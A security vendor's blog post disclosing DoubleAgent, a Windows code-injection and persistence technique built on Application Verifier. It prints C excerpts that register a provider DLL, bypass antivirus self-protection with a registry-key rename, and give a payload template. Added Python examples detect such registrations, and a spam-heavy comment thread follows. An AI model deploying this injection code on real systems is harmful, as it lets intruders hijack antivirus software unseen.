DoubleAgent: Zero-Day Code Injection and Persistence Technique
Printed 7/5/2018 from https://cybellum.com/doubleagentzero-day-code-injection-and-persistence-technique/ (Cybellum "Vulnerability Detection" blog)
by Michael Engstler | Mar 22, 2017 | Zero-Day Disclosure | 73 comments
Overview
We'd like to introduce a new zero-day technique for injecting code and maintaining persistence on a machine (i.e. auto-run), dubbed DoubleAgent. DoubleAgent works against:
- Every Windows version (Windows XP to Windows 10)
- Every Windows architecture (x86 and x64)
- Every Windows user context (SYSTEM/Admin/etc.)
- Every target process, including privileged processes (OS/Antivirus/etc.)
DoubleAgent abuses a legitimate, 15-year-old Windows feature and therefore cannot be patched away. It does require a privileged (administrator) account on the victim machine; it is a post-breach technique (see the update at the end of the post).
Code Injection
DoubleAgent gives the attacker the ability to inject any DLL into any process. The injection happens extremely early in the victim process's startup, giving the attacker full control over the process and leaving the process no way to protect itself. The injection technique is unusual enough that, at the time of writing, it was not detected or blocked by any antivirus we tested.
Persistency
DoubleAgent keeps injecting code after every reboot, making it a persistence technique that "survives" reboots, updates, reinstalls, patches, etc. Once the attacker registers a DLL for a process, the two are bound until the registration is removed: even if the victim completely uninstalls and reinstalls the program, the attacker's DLL is still injected every time the process executes.
Attack Vectors
Attacking Antivirus & Next Generation Antivirus – Taking full control of any antivirus by injecting code into it while bypassing all of its self-protection mechanisms. The attack has been verified and works on all the major antiviruses, including but not limited to: Avast, AVG, Avira, Bitdefender, Comodo, ESET, F-Secure, Kaspersky, Malwarebytes, McAfee, Norton, Panda, Quick Heal and Trend Micro.
Installing Persistent Malware – Installing malware that "survives" reboots and is automatically executed once the operating system boots.
Hijacking Permissions – Hijacking the permissions of an existing trusted process to perform malicious operations in the guise of the trusted process, e.g. exfiltrating data, C&C communication, lateral movement, stealing and encrypting sensitive data.
Altering Process Behavior – Modifying the behavior of the process, e.g. installing backdoors, weakening encryption algorithms, etc.
Attacking Other Users/Sessions – Injecting code into processes of other users/sessions (SYSTEM/Admin/etc.).
Technical Deep Dive
Microsoft Application Verifier Provider
Microsoft offers a standard way to install runtime verification tools for native code via Microsoft Application Verifier provider DLLs. A verifier provider DLL is simply a DLL that is loaded into the process and is responsible for performing runtime verification of the application. To register a new Application Verifier provider DLL, one creates the DLL and registers it by creating a set of values in the registry. Once a DLL has been registered as a verifier provider for a process, the Windows loader injects it into the process every time the process starts, even after reboots/updates/reinstalls/patches/etc.
Registration
Application Verifier providers are registered per executable name, meaning each DLL is bound to a specific image name and is injected into every new process launched with that name, regardless of the path. For example, if one registers DoubleAgentDll.dll for cmd.exe and launches both "C:\cmd.exe" and "C:\Windows\System32\cmd.exe", DoubleAgentDll.dll is injected into both processes. Once registered, the injection is performed automatically by the operating system every time a new process is created with the registered name, consistently and regardless of reboots/updates/reinstalls/patches or anything else. One can register a new Application Verifier provider using our publicly available DoubleAgent project, or integrate the registration capabilities into an existing project using our verifier module.

```
Usage: DoubleAgent.exe install|uninstall|repair process_name
e.g. DoubleAgent.exe install cmd.exe
```
```c
/* Public interface of the DoubleAgent verifier module (header excerpt). The second
 * parameter of Install/Uninstall is cut off at the right margin in the original
 * listing; it is shown here as pcwszVrfDllName, the name the Uninstall line begins with. */

/*
 * Installs an application verifier for the process
 */
DOUBLEAGENT_STATUS VERIFIER_Install(IN PCWSTR pcwszProcessName, IN PCWSTR pcwszVrfDllName);

/*
 * In some cases (application crash, exception, etc.) the install/uninstall does not complete.
 * Repairs the machine to its original state
 */
DOUBLEAGENT_STATUS VERIFIER_Repair(VOID);

/*
 * Uninstalls the application verifier from the process
 */
VOID VERIFIER_Uninstall(IN PCWSTR pcwszProcessName, IN PCWSTR pcwszVrfDllName);
```
Under the hood, the registration creates two new registry values under the per-image key:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PROCESS_NAME
The final result (shown as a registry screenshot in the original post) is a PROCESS_NAME key holding a GlobalFlag REG_DWORD value of 0x100 (FLG_APPLICATION_VERIFIER) and a VerifierDlls REG_SZ value naming the provider DLL.
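For defenders, the same two values are the artifact to look for. Below is an added example, not part of the original post or the DoubleAgent project: a small Python audit over a .reg export of the IFEO key that flags every per-image key with the FLG_APPLICATION_VERIFIER bit set in GlobalFlag or a VerifierDlls value present, and additionally calls out keys that sit under a renamed look-alike parent such as "Image File Execution Options Temp" (the residue a crashed rename trick would leave behind). The sample export is constructed; real input is the decoded text of `reg export` run on the IFEO key.

```python
"""Audit a .reg export of the IFEO key for Application Verifier provider registrations.

Added example (not from the original post or the DoubleAgent project). Real input:
  reg export "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" ifeo.reg
then open("ifeo.reg", encoding="utf-16").read()  (reg.exe writes UTF-16 text).
"""
import re

FLG_APPLICATION_VERIFIER = 0x100  # GlobalFlag bit that makes ntdll load VerifierDlls
IFEO_NAME = "image file execution options"  # last component of the standard IFEO key


def parse_reg_export(text):
    """Minimal parser for the Registration Entries (.reg) text format.

    Returns {key_path: {value_name: value}}. Only dword: and quoted string values
    are decoded, which is all this audit needs; other value types are kept raw.
    """
    entries = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = entries.setdefault(line[1:-1], {})
            continue
        m = re.match(r'"([^"]+)"=(.*)$', line)
        if m is None or current is None:
            continue
        name, val = m.group(1), m.group(2)
        if val.startswith("dword:"):
            current[name] = int(val[len("dword:"):], 16)
        elif val.startswith('"') and val.endswith('"'):
            # .reg files escape backslashes and quotes inside string values
            current[name] = val[1:-1].replace('\\"', '"').replace("\\\\", "\\")
        else:
            current[name] = val
    return entries


def find_verifier_registrations(entries):
    """Return [(image_name, [reasons])] for every per-image key with AVRF turned on,
    including keys under a renamed look-alike parent ("...Options Temp")."""
    findings = []
    for key, values in entries.items():
        parent, _, image = key.rpartition("\\")
        parent_name = parent.rpartition("\\")[2].lower()
        if not parent_name.startswith(IFEO_NAME):
            continue  # not a per-image IFEO key (e.g. the IFEO root itself)
        gflag = values.get("GlobalFlag", 0)
        dlls = values.get("VerifierDlls")
        reasons = []
        if isinstance(gflag, int) and gflag & FLG_APPLICATION_VERIFIER:
            reasons.append("GlobalFlag has FLG_APPLICATION_VERIFIER (0x100) set")
        if dlls:
            reasons.append(f"VerifierDlls is set: {dlls!r}")
        if reasons and parent_name != IFEO_NAME:
            reasons.append(f"registered under a non-standard parent key: {parent!r}")
        if reasons:
            findings.append((image, reasons))
    return findings


# Constructed sample export (not from a real system): one DoubleAgent-style
# registration, one benign gflags setting (0x10 = heap tail checking, no AVRF),
# and residue under a renamed parent key.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe]
"GlobalFlag"=dword:00000100
"VerifierDlls"="DoubleAgentDll.dll"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\devenv.exe]
"GlobalFlag"=dword:00000010

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options Temp\avservice.exe]
"GlobalFlag"=dword:00000100
"VerifierDlls"="DoubleAgentDll.dll"
'''

if __name__ == "__main__":
    for image, reasons in find_verifier_registrations(parse_reg_export(SAMPLE_REG)):
        print(f"[!] {image}: " + "; ".join(reasons))
```

A VerifierDlls value without the 0x100 bit is inert but still worth reporting, since it is the staged half of a registration; conversely a GlobalFlag with other bits set (as devenv.exe above) is ordinary gflags usage and is not flagged.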
Some antiviruses try to protect the keys of their processes under "Image File Execution Options" by blocking any attempt to create or modify keys there. For example, an antivirus might block any attempt to access "Image File Execution Options\ANTIVIRUS_NAME".
These simple protections can easily be bypassed by slightly modifying the registry path. Instead of accessing "Image File Execution Options\ANTIVIRUS_NAME", we first rename "Image File Execution Options" to a temporary name such as "Image File Execution Options Temp", create the new registry values under "Image File Execution Options Temp\ANTIVIRUS_NAME", and then rename "Image File Execution Options Temp" back to its original name.
Because the creation of the new values happened under "Image File Execution Options Temp\ANTIVIRUS_NAME" and not under "Image File Execution Options\ANTIVIRUS_NAME", this was enough to bypass the antivirus self-protection: the protection matched on the path string, while the key itself (and everything under it) kept its identity across the rename. Of all the antiviruses we tested only a few tried to protect their registry keys, and all of them were bypassed using the "Rename Technique". The "Rename Technique" has been implemented as part of our verifier module and can be used out of the box.
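A detection rule written the same way as the bypassed self-protection, i.e. anchored on the exact IFEO path, fails for the same reason. The following is an added Python example, not from the original post or the DoubleAgent project, that runs a naive rule and a hardened rule over a constructed sequence of Sysmon registry events (Event ID 13, RegistryEvent Value Set; Event ID 14, RegistryEvent Key and Value Rename) in the order the rename trick produces them. The field names are Sysmon's; the records are constructed, and the assumption that Sysmon renders a REG_DWORD in the Details field as `DWORD (0x...)` is marked in the code.

```python
"""Triage Sysmon registry events for Application Verifier provider registration.

Added example (not from the original post or the DoubleAgent project). Shows why a
rule matching the exact IFEO path misses writes made while the key is renamed,
and what a rule that survives the rename trick looks like.
"""
import re

FLG_APPLICATION_VERIFIER = 0x100
IFEO = r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"

# Constructed Sysmon records (EventID 13 = Value Set, 14 = Key/Value Rename) in the
# order DoubleAgent's rename trick produces them, plus a benign gflags write.
SAMPLE_EVENTS = [
    {"EventID": 14, "Image": r"C:\Users\victim\DoubleAgent.exe",
     "TargetObject": IFEO, "NewName": IFEO + " Temp"},
    {"EventID": 13, "Image": r"C:\Users\victim\DoubleAgent.exe",
     "TargetObject": IFEO + r" Temp\avservice.exe\VerifierDlls",
     "Details": "DoubleAgentDll.dll"},
    {"EventID": 13, "Image": r"C:\Users\victim\DoubleAgent.exe",
     "TargetObject": IFEO + r" Temp\avservice.exe\GlobalFlag",
     "Details": "DWORD (0x00000100)"},   # assumed Sysmon rendering of REG_DWORD
    {"EventID": 14, "Image": r"C:\Users\victim\DoubleAgent.exe",
     "TargetObject": IFEO + " Temp", "NewName": IFEO},
    {"EventID": 13, "Image": r"C:\Windows\System32\gflags.exe",
     "TargetObject": IFEO + r"\devenv.exe\GlobalFlag",
     "Details": "DWORD (0x00000010)"},   # heap tail checking, no AVRF bit
]


def _dword(details):
    """Parse the 'DWORD (0x...)' rendering of a REG_DWORD; None if not a DWORD."""
    m = re.search(r"0x([0-9A-Fa-f]+)", details or "")
    return int(m.group(1), 16) if m else None


def _is_avrf_value_set(event):
    """True for a Value Set event that names a provider DLL or turns the AVRF
    bit on, regardless of what the parent key is currently called."""
    if event["EventID"] != 13:
        return False
    value_name = event["TargetObject"].rpartition("\\")[2].lower()
    if value_name == "verifierdlls":
        return True
    if value_name == "globalflag":
        flags = _dword(event.get("Details"))
        return flags is not None and bool(flags & FLG_APPLICATION_VERIFIER)
    return False


def naive_rule(events):
    """Rule anchored on the exact IFEO path, like the bypassed AV self-protection.
    Returns indices of the events it alerts on."""
    prefix = IFEO.lower() + "\\"
    return [i for i, e in enumerate(events)
            if e["TargetObject"].lower().startswith(prefix) and _is_avrf_value_set(e)]


def hardened_rule(events):
    """Alert on (a) any rename of the IFEO key itself, in either direction, and
    (b) any VerifierDlls / GlobalFlag-with-0x100 write anywhere under
    CurrentVersion, whatever the parent key is called at that moment."""
    hits = []
    ifeo_lower = IFEO.lower()
    for i, e in enumerate(events):
        if e["EventID"] == 14 and ifeo_lower in (
                e["TargetObject"].lower(), e.get("NewName", "").lower()):
            hits.append(i)
        elif _is_avrf_value_set(e) and "\\currentversion\\" in e["TargetObject"].lower():
            hits.append(i)
    return hits


if __name__ == "__main__":
    print("naive rule alerts on events:", naive_rule(SAMPLE_EVENTS))
    print("hardened rule alerts on events:", hardened_rule(SAMPLE_EVENTS))
```

The naive rule sees nothing at all: the two value writes land under "...Options Temp", and the benign gflags write lacks the 0x100 bit. The hardened rule alerts on the rename itself and on both writes, which is the same lesson the AV vendors had to learn: key the protection on the value being written and on the rename operation, not on the parent path string.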
```c
/* Excerpt from the DoubleAgent verifier module (VERIFIER_Install). The original
 * listing is cut off at the right margin: the Win32 argument lists below were
 * completed from the documented RegSetKeyValueW / RegRenameKey / RegOpenKeyExW
 * signatures and the values described in the text (VerifierDlls = REG_SZ DLL name,
 * GlobalFlag = REG_DWORD FLG_APPLICATION_VERIFIER); project-specific identifiers
 * that were cut off are left as they appear and marked "cut off". */

/* Creates the VerifierDlls value and sets it to the verifier dll name */
bCreatedVerifierDlls = (ERROR_SUCCESS == RegSetKeyValueW(hIfeoKey, pcwszProcessName,
                                                         L"VerifierDlls", REG_SZ, pcwszVrfDllName,
                                                         (DWORD)((wcslen(pcwszVrfDllName) + 1) * sizeof(WCHAR))));

/*
 * Creates the GlobalFlag value and sets it to FLG_APPLICATION_VERIFIER (0x100)
 * Read more: https://msdn.microsoft.com/en-us/library/windows/hardware/ (URL cut off)
 */
dwGlobalFlag = FLG_APPLICATION_VERIFIER;
bCreatedGlobalFlag = (ERROR_SUCCESS == RegSetKeyValueW(hIfeoKey, pcwszProcessName,
                                                       L"GlobalFlag", REG_DWORD, &dwGlobalFlag,
                                                       sizeof(dwGlobalFlag)));

/*
 * The key creation might fail because some antiviruses protect the key.
 * One possible bypass is to rename the IFEO key name to a temporary name.
 */
if ((FALSE == bCreatedVerifierDlls) || (FALSE == bCreatedGlobalFlag))
{
    /* Renames the IFEO key name to a temporary name */
    if (ERROR_SUCCESS != RegRenameKey(hIfeoKey, NULL, VERIFIER_IMAGE_FI /* cut off: constant holding L"Image File Execution Options Temp" */))
    {
        DOUBLEAGENT_SET(eStatus, DOUBLEAGENT_STATUS_DOUBLEAGENT_VERIFIE /* cut off */);
        goto lbl_cleanup;
    }
    bKeyRenamed = TRUE;

    /*
     * Opens the temporary IFEO key
     * The key is reopened because some antiviruses continue monitoring (rest of the comment cut off)
     */
    if (ERROR_SUCCESS != RegOpenKeyExW(HKEY_LOCAL_MACHINE, VERIFIER_IMA /* cut off: path of the temporary key */,
                                       0, KEY_WRITE, &hIfeoKeyTemp))
    {
        DOUBLEAGENT_SET(eStatus, DOUBLEAGENT_STATUS_DOUBLEAGENT_VERIFIE /* cut off */);
        goto lbl_cleanup;
    }

    if (FALSE == bCreatedVerifierDlls)
    {
        /* Tries again to create the VerifierDlls value, this time under the renamed key */
        if (ERROR_SUCCESS != RegSetKeyValueW(hIfeoKeyTemp, pcwszProcessName,
                                             L"VerifierDlls", REG_SZ, pcwszVrfDllName,
                                             (DWORD)((wcslen(pcwszVrfDllName) + 1) * sizeof(WCHAR))))
        {
            DOUBLEAGENT_SET(eStatus, DOUBLEAGENT_STATUS_DOUBLEAGENT_VER /* cut off */);
            goto lbl_cleanup;
        }
        bCreatedVerifierDllsTemp = TRUE;
    }

    if (FALSE == bCreatedGlobalFlag)
    {
        /* Tries again to create the GlobalFlag value, this time under the renamed key */
        if (ERROR_SUCCESS != RegSetKeyValueW(hIfeoKeyTemp, pcwszProcessName,
                                             L"GlobalFlag", REG_DWORD, &dwGlobalFlag,
                                             sizeof(dwGlobalFlag)))
        {
            DOUBLEAGENT_SET(eStatus, DOUBLEAGENT_STATUS_DOUBLEAGENT_VER /* cut off */);
            goto lbl_cleanup;
        }
        bCreatedGlobalFlagTemp = TRUE;
    }
}
```

Injection
Every process starts when the operating system transfers control from kernel mode to user mode by calling ntdll!LdrInitializeThunk. From this moment ntdll is responsible for initializing the process (initializing globals, loading imports, etc.) and eventually transferring control to the executed program's main function.
The process is in such an infant stage that the only loaded modules are ntdll.dll and the executable (NS.exe in the original post's debugger screenshots).
Ntdll doesn't waste time and starts initializing the process; most of the initialization happens in ntdll!LdrpInitializeProcess.
Normally the first DLL to be loaded would be kernel32.dll.
But if Application Verifier is on, ntdll!LdrpInitializeProcess calls ntdll!AVrfInitializeVerifier, which causes our verifier provider DLL to be loaded just before kernel32.
Loading at such an early stage, before any other system DLL, gives us absolute control over the process.
Once our DLL has been loaded by ntdll, our DllMain is called and we are free to do as we wish inside the victim process.
```c
/* DLL_PROCESS_ATTACH handler from the DoubleAgent DLL template: the marked section
 * is where the payload goes. At this point only ntdll.dll and the executable are
 * loaded (see above), so the payload cannot rely on kernel32 or other imports. */
static BOOL main_DllMainProcessAttach(VOID)
{
    DOUBLEAGENT_STATUS eStatus = DOUBLEAGENT_STATUS_INVALID_VALUE;

    /*
     **********************************************************************
     Enter Your Code Here
     **********************************************************************
     */

    /* Succeeded */
    DOUBLEAGENT_SET(eStatus, DOUBLEAGENT_STATUS_SUCCESS);

    /* Returns status */
    return FALSE != DOUBLEAGENT_SUCCESS(eStatus);
}
```
Microsoft has provided a new design concept for antivirus vendors called Protected Processes. The concept is specially designed for antivirus services: antivirus processes can be created as "Protected Processes", and the protected process infrastructure only allows trusted, signed code to load and has built-in defense against code injection attacks.
This means that even if an attacker found a new zero-day technique for injecting code, it could not be used against the antivirus, because the injected code is not signed. At the time of writing no antivirus (except Windows Defender) has implemented this design, even though Microsoft made it available more than 3 years ago. It's important to note that even if the antivirus vendors block the registration attempts, the code injection and persistence techniques will remain available, since they are a legitimate part of the OS.
Source Code
The DoubleAgent source code project can be found on our company's public GitHub: https://github.com/Cybellum/DoubleAgent
Summary
Attackers are always evolving and finding new zero-day attacks. We need to make more effort to detect and prevent these attacks, and stop blindly trusting traditional security solutions that, as shown here, are not only ineffective against zero-days but also open new opportunities for the attacker to create complicated and deadly attacks.
*Update
To clarify: of course we haven't discovered the existence of Application Verifier; it's part of the OS so that users can use it. Application Verifier as a hooking technique was discussed long ago, as early as 2011. What we discovered and focused on was that AVRF can be used for:
1. A generic code injection technique that is undetected by AV.
2. A generic persistence technique that is also undetected by AV.
3. And most importantly, injecting code directly into the AV while bypassing its self-protection techniques.
None of these points were discussed in previous articles. We believe these points are a significant tool that can be used by attackers to help bypass and abuse antivirus software.
You do need a privileged account to run DoubleAgent, as DoubleAgent is designed as a post-breach attack. Even after a computer is breached, an attacker still needs to hide from the AV, spread its code, maintain persistence and find ways to exfiltrate/steal/encrypt data without being caught. DoubleAgent gives the attacker the ability to control the AV and perform all the operations above without being detected, while keeping the illusion that the AV is working normally.
73 Comments
– ESET AV does implement "Protected Processes", however not for all of its processes, so they are still vulnerable.
– Trend Micro just released a hotfix for the vulnerability; you can find the official hotfix here.
Robert on March 21, 2017 at 5:06 pm
Once again – great article.
I hope that the rest of the vendors will issue a fix ASAP.
zzz on March 23, 2017 at 6:09 am
zzzz
deepak on March 22, 2017 at 5:52 am
simply awesome!!!
Ronen on March 22, 2017 at 8:32 am
Just tested the GitHub code RN on my Win8.1 VM. It works great.
Keep up the good work fellows
Dje on March 23, 2017 at 3:00 pm
Rhaaa… Can't manage to build it to test in a VM. The PlatformToolset=141 is killing me; it only works with 140, but the exe seems not to be working (no registry keys created). Any tip? Which VS did you use? Thanks
Michael on March 26, 2017 at 4:46 pm
We used VS2017, should work for older versions too.
Contact us at info@cybellum.com and we would try to
help.
yun on March 26, 2017 at 8:31 am
Hi, when I test the DoubleAgent project on Win7_x64 with "DoubleAgent.exe install notepad.exe", one error occurs: "application can not start 0xc0000142". Could you please give some tips?
Michael on March 26, 2017 at 4:47 pm
We need a bit more details, contact us at
info@cybellum.com and we would try to help.
Tkchet on March 26, 2017 at 12:27 pm
How can I get a sample of the code for testing?
Michael on March 26, 2017 at 4:45 pm
Available on GitHub
https://github.com/Cybellum/DoubleAgent
zalehack on March 22, 2017 at 8:52 am
Good job, thanks!
tihsllub on March 22, 2017 at 9:03 am
Wow. If you’re running code as a local administrator, you can inject
any code you want in non-PPL processes (requires a MICROSOFT
digital signature, not suitable for AV). Wow. Such not a legitimate
feature. Such unique. Such a 0day. Definitely needs a new logo.
Anyway, nice persistence code injection/technique.
freeko on March 22, 2017 at 12:03 pm
Thumbs up. Zero-day keyword should be removed IMHO
Aviv on March 22, 2017 at 2:05 pm
As far as I know zero-day stands for a new, unpatched vulnerability, which is the case here. So why do you think these keywords should be removed?
Aviv on March 22, 2017 at 2:08 pm
Indeed running as administrator – but does it mean that I
should be able to inject my DLL into a protected/trusted
process? cross session? cross user? Isn’t it true that I can
use this vulnerability to exfiltrate data from a trusted
process?
undocumented on March 23, 2017 at 8:49 am
No. It’s not a vulnerability. Period.
If you’re admin, you’re admin. Just become system
(psexec/service/etc.) and do whatever you want on
non-PPL processes.
Anonymous on March 22, 2017 at 9:55 am
Undocumented? Really?
http://kitrap08.blogspot.com.au/2011/04/application-verifier.html
a on March 22, 2017 at 12:11 pm
Some Russian dude published something, and you call it
documented?
You guys are killing me…
me on March 22, 2017 at 11:09 pm
https://blogs.msdn.microsoft.com/reiley/2012/08/17/a-debugging-approach-to-application-verifier/
me on March 23, 2017 at 6:53 pm
What about Alex Ionescu's amazing presentation about HookingNirvana at Recon 2015?
https://github.com/ionescu007/HookingNirvana/blob/master/verif.dll/verif.c
And what about Alex Ionescu's tweet?
https://twitter.com/aionescu
NtMapViewOfSection on March 23, 2017 at 7:40 pm
They didn't claim to discover Application Verifier, and neither did Alex Ionescu (Application Verifier has been around long before Alex, as early as 2011: http://kitrap08.blogspot.co.il/2011/04/application-verifier.html).
This discovery is about how to abuse Application Verifier in a post-breach situation. Once an attacker managed to breach a network and gain privileges, he still needs to deal with the AV for every step he takes (downloading/uploading data, infecting other processes, maintaining persistence, etc.).
This discovery gives an attacker the tools to take over the AV and use it to perform stealthy data exfiltration, C&C communication, lateral movement, etc. All this while maintaining a false perception as if the AV is working normally. This was not presented in Alex's articles (or in fact any other article on the web).
Varunendra on March 22, 2017 at 12:14 pm
This is simply Amazing.
Nice finding guys kudos
plipopipopa on March 22, 2017 at 12:16 pm
It’s kind of like the Linux LD_PRELOAD, isn’t it ?
jackfire on March 22, 2017 at 3:21 pm
This is simply Amazing finding for desktop OS…
kudos guys.
Malin on March 22, 2017 at 5:29 pm
It looks like the crap carries on from build to build on all OS’s. I was
just reading the other day about the HDLC bug in Linux. Just
another piece of crap that should’ve been removed a long time
ago.
scooller on March 23, 2017 at 2:19 am
Why have I got a 0xc0000142 error when I try to inject an empty dll?
thepear on March 25, 2017 at 2:59 am
I get the same on Windows 7 when trying to run the sample
code.
Michael on March 26, 2017 at 4:48 pm
Contact us at info@cybellum.com and we would try to
help.
Jacob on March 23, 2017 at 4:51 am
Repackaging a 2012 MSDN article as a "zero day"?
https://blogs.msdn.microsoft.com/reiley/2012/08/17/a-debugging-approach-to-application-verifier/
A-Friend-of-Jacob on March 23, 2017 at 7:51 pm
What?? Would writing malware that uses WinAPI be considered repackaging WinAPI? The whole point of the post is to ABUSE AVRF in order to perform malicious operations. The link you posted talks about how to use AVRF for the purpose it was built for; this post takes it a step further and abuses it to bypass AV self-protection techniques.
Jacob on March 23, 2017 at 11:10 pm
Writing malware that abuses the Win32 API would not be considered a "Zero Day", so I don't know what point you are trying to make with that analogy. Besides, the Image File Execution Options registry key has been known as a malware persistence mechanism for years. There is absolutely nothing new in the entire blog post.
Larks on March 23, 2017 at 12:50 pm
What events that leads to a successful injection should we be
keeping an eye on using Microsoft SYSMON or the likes?
Your research is just as awesome as it is giving me headaches
BR,
Larks
Krunal on March 23, 2017 at 1:12 pm
How does this attack affect the victim's computer? For example, by visiting any site or downloading something from the internet?
Avi on March 23, 2017 at 1:51 pm
kudos !!!!
Kevin on March 23, 2017 at 2:03 pm
Does this affect all Windows Server versions or only some? If it affects some versions, which ones?
Abdul Adil on March 24, 2017 at 7:29 am
How can i build the source code?
Specs on March 24, 2017 at 9:59 am
Has anyone tried this against a commercial version of McAfee?
They are suggesting that they are not vulnerable as they block DLL
injection, but me thinks they have not fully understood this
technique.
Michael on March 26, 2017 at 4:52 pm
McAfee commercial version was found vulnerable. After the
publication, McAfee released a patch and are now
protected.
Don on March 24, 2017 at 1:23 pm
Would appreciate it if you retested ESET using your registry bypass method, since ESET has published an advisory that a mitigation patch has been deployed, i.e. HIPS module 1273.
Michael on March 26, 2017 at 4:52 pm
ESET released a patch and are now protected.
Joe on March 24, 2017 at 6:38 pm
visual studio
augusto de arruda botelho on March 25, 2017 at 1:44 am
Hey there! Would you mind if I share your blog with my myspace group? There's a lot of folks that I think would really enjoy your content. Please let me know. Many thanks
Don on March 25, 2017 at 2:45 pm
Discovered this way of running Application Verifier using a standard user account:
Administrator: Per user verifier settings allow standard users to use Application Verifier on Windows Vista. To enable per user verifier settings, administrators will have to create the HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\ImageExecutionOptions REG_DWORD value in the registry and set it to 0x1. Once the change is made, you will need to reboot the machine and ask the standard user to try accessing Application Verifier again.
Ref.: https://msdn.microsoft.com/en-us/library/ms220948(v=vs.90).aspx
See if you can get your bypass to work under a SUA account.
Michael on March 26, 2017 at 4:58 pm
Thanks for the info; it can also be done without rebooting the machine by calling NtSetSystemInformation (requires SeTcbPrivilege).
http://www.geoffchappell.com/studies/windows/km/ntoskrnl/api/ex/sysinfo/image_file_execution_options.htm?tx=48
Don on March 26, 2017 at 1:25 pm
A bit more detail on using verifier.dll from a standard user account here: https://msdn.microsoft.com/en-us/library/bb432502(v=vs.85).aspx
Sirmabus on March 26, 2017 at 7:46 pm
Thanks for pointing this technique out. Add it to the list with others
like the “AppInt” registry key way, and the custom keyboard layout
one (both of which load a DLL in ALL Windows processes, not
nicely targeted like this one).
Next time please cut a lot of the hype out. Understandable you’re
trying to promote yourself and/or your products, but you know a lot
of us that would read this in detail are tech people.
Michael on March 28, 2017 at 5:18 pm
The methods you mentioned (and many more) are similar to DoubleAgent as they are all code injection techniques. The main difference is that DoubleAgent was unknown and unprotected by AV vendors, meaning an attacker could use it to inject code anywhere (including into the AV itself) while bypassing the AV protection. In a post-breach scenario this can be a powerful weapon.
air conditioning beaufort sc on March 27, 2017 at 3:50 am
Can I simply say what a relief to find somebody that
actually knows what they are talking about on the internet.
You certainly understand how to bring a problem to light and make
it
important. A lot more people must read this and understand
this side of your story. I was surprised you are not more popular
given that you most certainly have the gift.
Douglass on March 31, 2017 at 6:11 am
Nice read, I just passed this onto a friend who was doing a little
research on that. And he just bought me lunch as I found it for him
smile Therefore let me rephrase that: Thank you for lunch!
Lindsay on April 1, 2017 at 5:44 am
Hey there just wanted to give you a quick heads up and let you
know a few of the pictures aren’t loading properly. I’m not sure why
but I think its a linking issue. I’ve tried it in two different browsers
and both show the same outcome.
Dionne on April 3, 2017 at 9:47 am
I don't even know how I ended up here, but I thought this post was good. I don't know who you are but definitely you are going to be a famous blogger if you aren't already. Cheers!
Mas Co on April 4, 2017 at 3:50 pm
Sorry for the multiple posts. The injection is working as it should when I try it on Windows Server 2016, but only from an admin account; if I try to execute the exe from a normal user, the admin password prompt pops up asking for the admin's password.
Michael on April 5, 2017 at 2:09 pm
As stated above, You do need a privileged account (admin)
to run DoubleAgent.
Dave on April 5, 2017 at 1:54 pm
I’m very happy to read this. This is the type of manual that needs to
be given and not the accidental misinformation that’s at the other
blogs. Appreciate your sharing this greatest doc.
Nicky on April 5, 2017 at 3:44 pm
It’s perfect time to make a few plans for the future and it is time to
be happy. I’ve learn this post and if I may just I desire to suggest
you some attention-grabbing things or tips. Perhaps you could write
next articles relating to this article. I want to read more things about
it!
Dwight on April 7, 2017 at 4:17 pm
What’s Happening i am new to this, I stumbled upon this I’ve found
It absolutely helpful and it has aided me out loads. I hope to
contribute & help other users like its aided me. Great job.
corburt erilio on April 9, 2017 at 9:59 pm
Hmm it appears like your site ate my first comment (it was
extremely long) so I guess I’ll just sum it up what I wrote and say, I’m
thoroughly enjoying your blog. I too am an aspiring blog blogger
but I’m still new to everything. Do you have any helpful hints for
first-time blog writers? I’d certainly appreciate it.
OldMan on April 11, 2017 at 12:03 pm
Doesn't seem the AVs are taking this too seriously. I know that Norton has seemed to ignore this, saying that it takes user intervention at the computer. I think that all vendors should have this patched and Microsoft should be working on a patch too. Everyone wants to throw blame around but no one seems to want to work together for a fix. Today it is DoubleAgent, tomorrow who knows what. I think it is terrible how it has been handled.
Jason F Enos on April 14, 2017 at 12:32 am
I'll immediately grab your rss feed as I can not find your email subscription hyperlink or e-newsletter service. Do you've any? Please let me understand in order that I may just subscribe. Thanks.
ggg on April 14, 2017 at 7:27 am
On Windows 7 it does NOT work =((( (how to load a PE without Kernel32.dll???). Example???
Michael on April 17, 2017 at 11:00 am
https://github.com/Cybellum/DoubleAgent/issues/2#issuecomment-289804888
ggg on April 18, 2017 at 6:58 am
There is no answer to my question.
Where is a code sample that allows you to run PE on
Win7?
Michael on April 18, 2017 at 9:57 am
We don’t have such sample, you’ll need to
code it yourself.
The Lost Ways Survivalism eBook on April 18, 2017 at 9:06 pm
Superb article and fantastic webpage. Delighted I came across this
while checking hash tags on Twitter.
Yukiko on April 21, 2017 at 11:41 pm
Its like you read my thoughts! You seem to grasp
a lot approximately this, like you wrote the e-book in it or
something. I think that you just could do with some p.c.
to pressure the message house a little bit, but instead of that, that is
magnificent blog. A great read. I’ll certainly be back.
Glayds on April 22, 2017 at 1:11 pm
Greetings from California! I’m bored to tears at work so I decided to
browse your blog on my iphone during lunch break. I enjoy the
knowledge you present here and can’t wait to take a look when I
get home. I’m surprised at how quick your blog loaded on my
mobile .. I’m not even using WIFI, just 3G .. Anyhow, very good site!
Joshua on April 25, 2017 at 10:44 am
Hey I am so delighted I found your site, I really found you by error,
while I was researching on Google for something else, Regardless I
am here now and would just like to say cheers for a tremendous
post and a all round enjoyable blog (I also love the theme/design), I
don’t have time to read through it all at the moment but I have
saved it and also included your RSS feeds, so when I have time I
will be back to read much more, Please do keep up the superb job.
